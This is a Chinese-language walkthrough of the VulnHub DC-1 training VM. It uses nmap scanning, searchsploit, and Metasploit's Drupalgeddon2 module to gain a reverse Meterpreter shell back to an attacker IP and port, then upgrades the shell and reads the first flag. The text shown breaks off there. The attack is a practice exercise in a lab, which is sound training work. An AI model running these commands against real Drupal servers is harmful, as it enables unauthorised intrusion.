VulnHub DC-1 靶机渗透测试中,如何找到并利用特定漏洞进行攻击?
摘要:🛡️ VulnHub DC-1 靶机渗透测试笔记 靶机信息 靶机名称:DC-1 靶机来源:VulnHub 目标:获取所有 flag,最终提权至 root 难度:⭐⭐☆☆☆(入门级) 涉及技术:信息收集、Dru
🛡️ VulnHub DC-1 靶机渗透测试笔记
靶机信息
靶机名称:DC-1
靶机来源:VulnHub
目标:获取所有 flag,最终提权至 root
难度:⭐⭐☆☆☆(入门级)
涉及技术:信息收集、Drupal 漏洞利用、MySQL 数据库操作、Linux 权限提升、SSH 爆破
🔍 一、信息收集
1.1 主机发现
先查看一下本地网段,确认在 67 网段,使用 nmap 扫描存活主机:
nmap -sn 192.168.67.0/24
扫描结果中发现目标 IP 为 192.168.67.131。
1.2 端口与服务扫描
对目标 IP 进行详细扫描,获取开放端口、服务版本及系统信息:
nmap -A -T4 192.168.67.131
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7
111/tcp open rpcbind 2-4 (RPC #100000)
扫描结果分析:
端口
服务
关键信息
22
SSH
OpenSSH 6.0p1,版本较老
80
HTTP
Drupal 7,Apache 2.2.22
111
RPC
基本无利用价值
💡 关键发现: 80 端口运行的是 Drupal 7 CMS,这是一个存在多个高危漏洞的版本,是本次渗透的主要突破口。
💥 二、漏洞利用
2.1 搜索 Drupal 漏洞
使用 searchsploit 在本地漏洞库中搜索 Drupal 7 相关漏洞:
searchsploit drupal 7
发现 Drupalgeddon2(CVE-2018-7600) 漏洞,该漏洞允许未授权远程代码执行(RCE),危害极高。
2.2 使用 Metasploit 利用漏洞
启动 Metasploit 框架:
msfconsole
搜索并加载 Drupalgeddon2 模块:
search Drupalgeddon
use exploit/unix/webapp/drupal_drupalgeddon2
查看模块参数配置(Required: yes 为必填项):
show options
配置目标和本机 IP:
set RHOSTS 192.168.67.131
set LHOST 192.168.67.128
set LPORT 4444
执行攻击:
run
成功获取 Meterpreter shell,进入交互式终端:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看当前权限:
whoami # www-data
id
uname -a # Linux DC-1 3.2.0-6-486
⚠️ 当前为 www-data 权限,需要进一步提权。
🚩 三、寻找 Flag
3.1 Flag 1
查看当前目录文件,发现 flag1.txt:
Every good CMS needs a config file - and so do you.
💡 提示:去找 CMS 的配置文件。
